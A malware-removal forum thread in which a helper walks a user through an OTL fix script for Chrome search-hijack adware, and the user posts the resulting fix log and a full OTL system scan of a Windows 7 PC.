    • Cookies
    • Cache
  • Next select the Time Range to Clear drop-down menu
  • Select Everything (this will only delete all the cookies and cache, and will save the other items not selected)
  • Click Clear Now
=========================

bullseye_zpse9eaf36e.gif Run OTL.exe
    • Windows XP : Double click on the icon to run it.
    • Windows Vista, Windows 7 & 8 : Right click and select "Run as Administrator"
  • Copy/paste the following text written inside of the code box into the Custom Scans/Fixes box located at the bottom of OTL

    :OTL
    CHR - default_search_provider: search_url = http://searchou.com/...0000050b60df2d6
    CHR - homepage: http://searchou.com/...0000050b60df2d6
    O3 - HKCU\..\Toolbar\WebBrowser: (no name) - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - No CLSID value found.
    [2013/12/31 23:48:37 | 000,000,000 | ---D | C] -- C:\ProgramData\pfkajdnmeplnnlemjfagojglpeelceaj
    
    :Files
    ipconfig /flushdns /c
    
    :Commands
    [purity]
    [createrestorepoint]
    [emptytemp]
    [Reboot]
  • Then click the Run Fix button at the top
  • Let the program run unhindered
=========================

bullseye_zpse9eaf36e.gif Reboot

=========================

bullseye_zpse9eaf36e.gif Re-run OTL (it should be located on your desktop).
    • Windows XP : Double click on the icon to run it.
    • Windows Vista, Windows 7 & 8 : Right click and select "Run as Administrator"
  • Make sure all other windows are closed and to let it run uninterrupted.
  • When the window appears, underneath Output at the top change it to Minimal Output.
  • Uncheck the boxes beside LOP Check and Purity Check.
  • Click the Run Scan button. Do not change any settings unless otherwise told to do so. The scan wont take long.
  • When the scan completes, it will open one notepad window. OTL.Txt. (No Extras.txt will be produced)
    Note:The log can be located in the OTL. folder on you C:\ drive if they fail to open automatically.
  • Please copy (Edit->Select All, Edit->Copy) the contents of the file, and post it with your next reply.
=========================

In your next post please provide the following:
  • OTL fix log
  • Fresh OTL.txt
  • Any change in performance?

OCD

Proud Graduate of WTT Classroom
Member of UNITE

Threads will be closed if no response after 5 days








If you are satisfied with the help you have received, please consider making a donation.


#7 Midnight Sky

Midnight Sky

    New Member

  • Authentic Member
  • Pip
  • 9 posts

Posted 04 January 2014 - 03:29 AM

All processes killed
========== OTL ==========
Use Chrome's Settings page to remove the default_search_provider items.
Use Chrome's Settings page to change the HomePage.
Registry value HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{21FA44EF-376D-4D53-9B0F-8A89D3229068} deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{21FA44EF-376D-4D53-9B0F-8A89D3229068}\ not found.
C:\ProgramData\pfkajdnmeplnnlemjfagojglpeelceaj folder moved successfully.
========== FILES ==========
< ipconfig /flushdns /c >
Windows IP Configuration
Successfully flushed the DNS Resolver Cache.
C:\Users\Wesley\Desktop\cmd.bat deleted successfully.
C:\Users\Wesley\Desktop\cmd.txt deleted successfully.
========== COMMANDS ==========
Restore point Set: OTL Restore Point
 
[EMPTYTEMP]
 
User: All Users
 
User: Default
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 56466 bytes
 
User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 0 bytes
 
User: Public
->Temp folder emptied: 0 bytes
 
User: Wesley
->Temp folder emptied: 3538686483 bytes
->Temporary Internet Files folder emptied: 264185639 bytes
->Java cache emptied: 118684 bytes
->FireFox cache emptied: 72979876 bytes
->Google Chrome cache emptied: 7057286 bytes
->Flash cache emptied: 884 bytes
 
%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
%systemroot%\System32 (64bit) .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 2713164 bytes
%systemroot%\sysnative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files folder emptied: 46391131 bytes
RecycleBin emptied: 2412475 bytes
 
Total Files Cleaned = 3,752.00 mb
 
 
OTL by OldTimer - Version 3.2.69.0 log created on 01042014_040031

Files\Folders moved on Reboot...
C:\Users\Wesley\AppData\Local\Temp\FXSAPIDebugLogFile.txt moved successfully.
C:\Windows\temp\vmware-SYSTEM-1243027711\vmauthd.log moved successfully.
C:\Windows\temp\vmware-SYSTEM-1243027711\vmware-usbarb-SYSTEM-2608.log moved successfully.

PendingFileRenameOperations files...

Registry entries deleted on Reboot...
 

 

OTL logfile created on: 1/4/2014 4:12:24 AM - Run 4
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\Wesley\Desktop
64bit- Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.0.8112.16421)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
 
3.98 Gb Total Physical Memory | 2.52 Gb Available Physical Memory | 63.31% Memory free
7.96 Gb Paging File | 6.37 Gb Available in Paging File | 80.03% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 931.41 Gb Total Space | 239.71 Gb Free Space | 25.74% Space Free | Partition Type: NTFS
Drive D: | 6.85 Gb Total Space | 0.00 Gb Free Space | 0.00% Space Free | Partition Type: UDF
Drive H: | 1863.01 Gb Total Space | 21.24 Gb Free Space | 1.14% Space Free | Partition Type: NTFS
Drive M: | 1863.01 Gb Total Space | 27.15 Gb Free Space | 1.46% Space Free | Partition Type: NTFS
 
Computer Name: VERONICA | User Name: Wesley | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - C:\Users\Wesley\Desktop\OTL(1).exe (OldTimer Tools)
PRC - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_11_9_900_170.exe (Adobe Systems, Inc.)
PRC - C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation)
PRC - C:\Program Files (x86)\NCWest\NCLauncher\NCUpdateHelper.exe (NCSOFT Corporation)
PRC - C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe (Malwarebytes Corporation)
PRC - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe (Adobe Systems Incorporated)
PRC - C:\Windows\SysWOW64\vmnetdhcp.exe (VMware, Inc.)
PRC - C:\Windows\SysWOW64\vmnat.exe (VMware, Inc.)
PRC - C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe (VMware, Inc.)
PRC - C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe (Microsoft Corporation)
PRC - C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe (Microsoft Corporation)
PRC - C:\Program Files\Autodesk\3ds Max 2012\mentalimages\satellite\raysat_3dsmax2012_64server.exe ()
PRC - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe (NVIDIA Corporation)
PRC - C:\Program Files (x86)\Gigabyte\EasySaver\essvr.exe ()
 
 
========== Modules (No Company Name) ==========
 
MOD - c:\ProgramData\WebPlat\WebPlat.dll ()
MOD - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_9_900_170.dll ()
MOD - C:\Program Files (x86)\Mozilla Firefox\mozjs.dll ()
MOD - C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll ()
MOD - C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll ()
MOD - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\Nv3DVStreaming.dll ()
 
 
========== Services (SafeList) ==========
 
SRV:64bit: - (FLEXnet Licensing Service 64) -- C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService64.exe (Flexera Software, Inc.)
SRV:64bit: - (mi-raysat_3dsmax2012_64) -- C:\Program Files\Autodesk\3ds Max 2012\mentalimages\satellite\raysat_3dsmax2012_64server.exe ()
SRV:64bit: - (AMD External Events Utility) -- C:\Windows\SysNative\atiesrxx.exe (AMD)
SRV:64bit: - (976137e5) -- C:\Windows\SysNative\rundll32.exe (Microsoft Corporation)
SRV:64bit: - (msvsmon90) -- C:\Program Files\Microsoft Visual Studio 9.0\Common7\IDE\Remote Debugger\x64\msvsmon.exe (Microsoft Corporation)
SRV - (AdobeFlashPlayerUpdateSvc) -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe (Adobe Systems Incorporated)
SRV - (DAUpdaterSvc) -- C:\Program Files (x86)\Steam\steamapps\common\Dragon Age Ultimate Edition\bin_ship\DAUpdaterSvc.Service.exe (BioWare)
SRV - (MozillaMaintenance) -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe (Mozilla Foundation)
SRV - (ArcService) -- C:\Program Files (x86)\Perfect World Entertainment\Arc\ArcService.exe (Perfect World Entertainment Inc)
SRV - (MBAMService) -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe (Malwarebytes Corporation)
SRV - (MBAMScheduler) -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe (Malwarebytes Corporation)
SRV - (SkypeUpdate) -- C:\Program Files (x86)\Skype\Updater\Updater.exe (Skype Technologies)
SRV - (AdobeARMservice) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe (Adobe Systems Incorporated)
SRV - (clr_optimization_v4.0.30319_32) -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe (Microsoft Corporation)
SRV - (npggsvc) -- C:\Windows\SysWOW64\GameMon.des (INCA Internet Co., Ltd.)
SRV - (VMnetDHCP) -- C:\Windows\SysWOW64\vmnetdhcp.exe (VMware, Inc.)
SRV - (VMware NAT Service) -- C:\Windows\SysWOW64\vmnat.exe (VMware, Inc.)
SRV - (VMAuthdService) -- C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe (VMware, Inc.)
SRV - (sftvsa) -- C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe (Microsoft Corporation)
SRV - (sftlist) -- C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe (Microsoft Corporation)
SRV - (VMUSBArbService) -- C:\Program Files (x86)\Common Files\VMware\USB\vmware-usbarbitrator64.exe (VMware, Inc.)
SRV - (Steam Client Service) -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe (Valve Corporation)
SRV - (FLEXnet Licensing Service) -- C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe (Macrovision Europe Ltd.)
SRV - (Stereo Service) -- C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe (NVIDIA Corporation)
SRV - (ES lite Service) -- C:\Program Files (x86)\Gigabyte\EasySaver\essvr.exe ()
SRV - (clr_optimization_v2.0.50727_32) -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe (Microsoft Corporation)
SRV - (YahooAUService) -- C:\Program Files (x86)\Yahoo!\SoftwareUpdate\YahooAUService.exe (Yahoo! Inc.)
 
 
========== Driver Services (SafeList) ==========
 
DRV:64bit: - (MBAMProtector) -- C:\Windows\SysNative\drivers\mbam.sys (Malwarebytes Corporation)
DRV:64bit: - (VBoxNetAdp) -- C:\Windows\SysNative\drivers\VBoxNetAdp.sys (Oracle Corporation)
DRV:64bit: - (USBAAPL64) -- C:\Windows\SysNative\drivers\usbaapl64.sys (Apple, Inc.)
DRV:64bit: - (GEARAspiWDM) -- C:\Windows\SysNative\drivers\GEARAspiWDM.sys (GEAR Software Inc.)
DRV:64bit: - (vmx86) -- C:\Windows\SysNative\drivers\vmx86.sys (VMware, Inc.)
DRV:64bit: - (VMparport) -- C:\Windows\SysNative\drivers\VMparport.sys (VMware, Inc.)
DRV:64bit: - (vmkbd) -- C:\Windows\SysNative\drivers\VMkbd.sys (VMware, Inc.)
DRV:64bit: - (VMnetuserif) -- C:\Windows\SysNative\drivers\vmnetuserif.sys (VMware, Inc.)
DRV:64bit: - (VMnetBridge) -- C:\Windows\SysNative\drivers\vmnetbridge.sys (VMware, Inc.)
DRV:64bit: - (VMnetAdapter) -- C:\Windows\SysNative\drivers\vmnetadapter.sys (VMware, Inc.)
DRV:64bit: - (Sftvol) -- C:\Windows\SysNative\drivers\Sftvollh.sys (Microsoft Corporation)
DRV:64bit: - (Sftplay) -- C:\Windows\SysNative\drivers\Sftplaylh.sys (Microsoft Corporation)
DRV:64bit: - (Sftredir) -- C:\Windows\SysNative\drivers\Sftredirlh.sys (Microsoft Corporation)
DRV:64bit: - (Sftfs) -- C:\Windows\SysNative\drivers\Sftfslh.sys (Microsoft Corporation)
DRV:64bit: - (hcmon) -- C:\Windows\SysNative\drivers\hcmon.sys (VMware, Inc.)
DRV:64bit: - (vmci) -- C:\Windows\SysNative\drivers\vmci.sys (VMware, Inc.)
DRV:64bit: - (HpSAMD) -- C:\Windows\SysNative\drivers\HpSAMD.sys (Hewlett-Packard Company)
DRV:64bit: - (amdxata) -- C:\Windows\SysNative\drivers\amdxata.sys (Advanced Micro Devices)
DRV:64bit: - (amdsata) -- C:\Windows\SysNative\drivers\amdsata.sys (Advanced Micro Devices)
DRV:64bit: - (TsUsbFlt) -- C:\Windows\SysNative\drivers\TsUsbFlt.sys (Microsoft Corporation)
DRV:64bit: - (NVHDA) -- C:\Windows\SysNative\drivers\nvhda64v.sys (NVIDIA Corporation)
DRV:64bit: - (amdkmdag) -- C:\Windows\SysNative\drivers\atikmdag.sys (ATI Technologies Inc.)
DRV:64bit: - (amdkmdap) -- C:\Windows\SysNative\drivers\atikmpag.sys (Advanced Micro Devices, Inc.)
DRV:64bit: - (npf) -- C:\Windows\SysNative\drivers\npf.sys (CACE Technologies, Inc.)
DRV:64bit: - (RTHDMIAzAudService) -- C:\Windows\SysNative\drivers\RtHDMIVX.sys (Realtek Semiconductor Corp.)
DRV:64bit: - (nusb3xhc) -- C:\Windows\SysNative\drivers\nusb3xhc.sys (NEC Electronics Corporation)
DRV:64bit: - (nusb3hub) -- C:\Windows\SysNative\drivers\nusb3hub.sys (NEC Electronics Corporation)
DRV:64bit: - (xusb21) -- C:\Windows\SysNative\drivers\xusb21.sys (Microsoft Corporation)
DRV:64bit: - (RTL8167) -- C:\Windows\SysNative\drivers\Rt64win7.sys (Realtek                                            )
DRV:64bit: - (amdsbs) -- C:\Windows\SysNative\drivers\amdsbs.sys (AMD Technologies Inc.)
DRV:64bit: - (LSI_SAS2) -- C:\Windows\SysNative\drivers\lsi_sas2.sys (LSI Corporation)
DRV:64bit: - (Fs_Rec) -- C:\Windows\SysNative\drivers\fs_rec.sys (Microsoft Corporation)
DRV:64bit: - (stexstor) -- C:\Windows\SysNative\drivers\stexstor.sys (Promise Technology)
DRV:64bit: - (RTL8023x64) -- C:\Windows\SysNative\drivers\Rtnic64.sys (Realtek Semiconductor Corporation                           )
DRV:64bit: - (NVENETFD) -- C:\Windows\SysNative\drivers\nvm62x64.sys (NVIDIA Corporation)
DRV:64bit: - (ebdrv) -- C:\Windows\SysNative\drivers\evbda.sys (Broadcom Corporation)
DRV:64bit: - (b06bdrv) -- C:\Windows\SysNative\drivers\bxvbda.sys (Broadcom Corporation)
DRV:64bit: - (b57nd60a) -- C:\Windows\SysNative\drivers\b57nd60a.sys (Broadcom Corporation)
DRV:64bit: - (hcw85cir) -- C:\Windows\SysNative\drivers\hcw85cir.sys (Hauppauge Computer Works, Inc.)
DRV:64bit: - (AX88772) -- C:\Windows\SysNative\drivers\ax88772.sys (ASIX Electronics Corp.)
DRV - (gdrv) -- C:\Windows\gdrv.sys (Windows ® Server 2003 DDK provider)
DRV - (WIMMount) -- C:\Windows\SysWOW64\drivers\wimmount.sys (Microsoft Corporation)
DRV - (NPPTNT2) -- C:\Windows\SysWOW64\npptNT2.sys (INCA Internet Co., Ltd.)
 
 
========== Standard Registry (SafeList) ==========
 
 
========== Internet Explorer ==========
 
IE:64bit: - HKLM\..\SearchScopes,DefaultScope = {9BB47C17-9C68-4BB3-B188-DD9AF0FD2406}
IE:64bit: - HKLM\..\SearchScopes\{050F6D2A-CD2C-4CCF-A95E-9A59CEE646C0}: "URL" = http://www.bing.com/...rc=IE-SearchBox
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\..\SearchScopes,DefaultScope =
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...ms}&FORM=IE8SRC
IE - HKLM\..\SearchScopes\{52A54A6E-3E27-4A22-A928-6755ADA9CFFC}: "URL" = http://www.bing.com/...rc=IE-SearchBox
 
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
IE - HKCU\..\URLSearchHook: {81017EA9-9AA8-4A6A-9734-7AF40E7D593F} - C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn0\yt.dll (Yahoo! Inc.)
IE - HKCU\..\SearchScopes,DefaultScope =
IE - HKCU\..\SearchScopes\{16C1B23E-3CE1-4f7f-A708-A8F88D636FD7}: "URL" = http://search.yahoo....cevm&type=STDVM
IE - HKCU\..\SearchScopes\{182BD4F4-21ED-4e6c-B65D-F3B9DB6B36AE}: "URL" = http://www.google.co...2788:4067623346
IE - HKCU\..\SearchScopes\{39567D58-C4D9-4285-9C5C-208E15077106}: "URL" = http://www.bing.com/...=SPLBR2&pc=SPLH
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.local
 
========== FireFox ==========
 
FF - prefs.js..browser.search.defaultenginename: "Yahoo"
FF - prefs.js..browser.search.defaultenginename,S: S", ""
FF - prefs.js..browser.search.order.1,S: S", ""
FF - prefs.js..browser.search.param.yahoo-fr: "moz2-ytff-sunm"
FF - prefs.js..browser.search.param.yahoo-fr-cjkt: "moz2-ytff-sunm"
FF - prefs.js..browser.search.selectedEngine,S: S", ""
FF - prefs.js..browser.search.useDBForOrder: true
FF - prefs.js..browser.startup.homepage: "http://zassyen.net"
FF - prefs.js..extensions.enabledAddons: %7B73a6fe31-595d-460b-a920-fcc0f8843232%7D:2.6.8.10
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:26.0
FF - prefs.js..extensions.enabledItems: {73a6fe31-595d-460b-a920-fcc0f8843232}:2.1.0.3
FF - prefs.js..extensions.enabledItems: {CAFEEFAC-0016-0000-0023-ABCDEFFEDCBA}:6.0.23
FF - prefs.js..network.proxy.type: 0
FF - user.js - File not found
 
FF:64bit: - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF64_11_9_900_170.dll File not found
FF:64bit: - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: C:\Windows\system32\Wat\npWatWeb.dll (Microsoft Corporation)
FF:64bit: - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\5.0.61118.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_9_900_170.dll ()
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=:  File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.6.2: C:\Windows\SysWOW64\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.6.2: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@messenger.yahoo.com/YahooMessengerStatePlugin;version=1.0.0.6: C:\Program Files (x86)\Yahoo!\Shared\npYState.dll (Yahoo! Inc.)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: C:\Windows\system32\Wat\npWatWeb.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files (x86)\Microsoft Silverlight\5.0.61118.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0: C:\PROGRA~2\MIF5BA~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3502.0922: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3538.0513: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3555.0308: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@nvidia.com/3DVision: C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)
FF - HKLM\Software\MozillaPlugins\@nvidia.com/3DVisionStreaming: C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)
FF - HKLM\Software\MozillaPlugins\@pandonetworks.com/PandoWebPlugin: C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)
FF - HKLM\Software\MozillaPlugins\@perfectworld.com/npArcPlayNowPlugin: C:\Program Files (x86)\Perfect World Entertainment\Arc\plugins\npArcPluginFF.dll (Perfect World Entertainment Inc)
FF - HKLM\Software\MozillaPlugins\@playstation.com/PsndlCheck,version=1.00: C:\Program Files (x86)\Sony\PLAYSTATION Network Downloader\nppsndl.dll (Sony Computer Entertainment Inc.)
FF - HKLM\Software\MozillaPlugins\@SonyCreativeSoftware.com/Media Go,version=1.0: C:\Program Files (x86)\Sony\Media Go\npmediago.dll (Sony Network Entertainment International LLC)
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKCU\Software\MozillaPlugins\pandonetworks.com/PandoWebPlugin: C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)
FF - HKCU\Software\MozillaPlugins\vitzo.com/VDownloader: C:\Program Files\VDownloader\Addons\npVDownloader.dll (Vitzo)
 
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\support@vdownloader.com: C:\Program Files\VDownloader\Addons\FireFox [2012/11/07 10:42:15 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 26.0\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components [2013/12/11 08:19:51 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 26.0\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins [2014/01/03 15:59:20 | 000,000,000 | ---D | M]
 
[2012/10/12 01:09:57 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Wesley\AppData\Roaming\Mozilla\Extensions
[2014/01/03 15:59:20 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Wesley\AppData\Roaming\Mozilla\Firefox\Profiles\09qn4qhk.default\extensions
[2014/01/02 08:59:38 | 000,535,529 | ---- | M] () (No name found) -- C:\Users\Wesley\AppData\Roaming\Mozilla\Firefox\Profiles\09qn4qhk.default\extensions\{73a6fe31-595d-460b-a920-fcc0f8843232}.xpi
[2014/01/02 08:55:53 | 000,915,554 | ---- | M] () (No name found) -- C:\Users\Wesley\AppData\Roaming\Mozilla\Firefox\Profiles\09qn4qhk.default\extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi
[2013/12/11 08:19:51 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\extensions
[2013/12/11 08:19:51 | 000,000,000 | ---D | M] (Java Console) -- C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0034-ABCDEFFEDCBA}
[2013/12/11 08:19:50 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
[2013/12/11 08:19:54 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
 
========== Chrome  ==========
 
CHR - homepage:
CHR - default_search_provider: Search The Web (privitize) ()
CHR - default_search_provider: search_url = http://searchou.com/...0000050b60df2d6
CHR - default_search_provider: suggest_url =
CHR - homepage: http://searchou.com/...0000050b60df2d6
CHR - plugin: Silverlight 3 (Enabled) = default_plugin
CHR - plugin: Error reading preferences file
CHR - Extension: No name found = C:\Users\Wesley\AppData\Local\Google\Chrome\User Data\Default\Extensions\eoccbpoodnckjdnackiffhjfkogfhnhh\3.2.800\
CHR - Extension: FuanDEals = C:\Users\Wesley\AppData\Local\Google\Chrome\User Data\Default\Extensions\pmjghjlpeglhomoeofllnjbmkfojelei\2.2\
 
O1 HOSTS File: ([2012/05/13 14:52:47 | 000,000,027 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O1 - Hosts: 127.0.0.1       localhost
O2:64bit: - BHO: (DeAlEoxipRRESs) - {782901CE-CEDE-22C8-3EDF-BB5F7E77E683} - C:\ProgramData\DeAlEoxipRRESs\l7m.x64.dll ()
O2:64bit: - BHO: (FuanDEals) - {F2C4E697-A038-3939-62E6-60ABEF8A5266} - C:\ProgramData\FuanDEals\U.x64.dll ()
O2 - BHO: (DeAlEoxipRRESs) - {782901CE-CEDE-22C8-3EDF-BB5F7E77E683} - C:\ProgramData\DeAlEoxipRRESs\l7m.dll ()
O2 - BHO: (FuanDEals) - {F2C4E697-A038-3939-62E6-60ABEF8A5266} - C:\ProgramData\FuanDEals\U.dll ()
O4 - HKLM..\Run: [APSDaemon] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.)
O4 - HKLM..\Run: [NCUpdateHelper] C:\Program Files (x86)\NCWest\NCLauncher\NCUpdateHelper.exe (NCSOFT Corporation)
O4 - HKCU..\Run: [PlayNC Launcher]  File not found
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Restrictions present
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableLUA = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: PromptOnSecureDesktop = 0
O7 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O10:64bit: - NameSpace_Catalog5\Catalog_Entries64\000000000005 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)
O10:64bit: - Protocol_Catalog9\Catalog_Entries64\000000000011 - C:\Windows\SysNative\vsocklib.dll (VMware, Inc.)
O10:64bit: - Protocol_Catalog9\Catalog_Entries64\000000000012 - C:\Windows\SysNative\vsocklib.dll (VMware, Inc.)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000005 [] - C:\Program Files (x86)\Bonjour\mdnsNSP.dll (Apple Inc.)
O10 - Protocol_Catalog9\Catalog_Entries\000000000011 - C:\Windows\SysWOW64\vsocklib.dll (VMware, Inc.)
O10 - Protocol_Catalog9\Catalog_Entries\000000000012 - C:\Windows\SysWOW64\vsocklib.dll (VMware, Inc.)
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/...indows-i586.cab (Java Plug-in 10.6.2)
O16 - DPF: {CAFEEFAC-0016-0000-0034-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.6.0_34)
O16 - DPF: {CAFEEFAC-0017-0000-0006-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.7.0_06)
O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.7.0_06)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 75.75.75.75 75.75.76.76
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{13CBDABD-BDF8-4E2E-8B88-A4D9F83A7A58}: DhcpNameServer = 192.168.252.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{3CA9C62F-961E-44AC-995E-48E28CAF140A}: DhcpNameServer = 75.75.75.75 75.75.76.76
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{BB27403B-FA1B-4168-9C7B-4D4092729072}: DhcpNameServer = 68.87.68.166 68.87.74.166
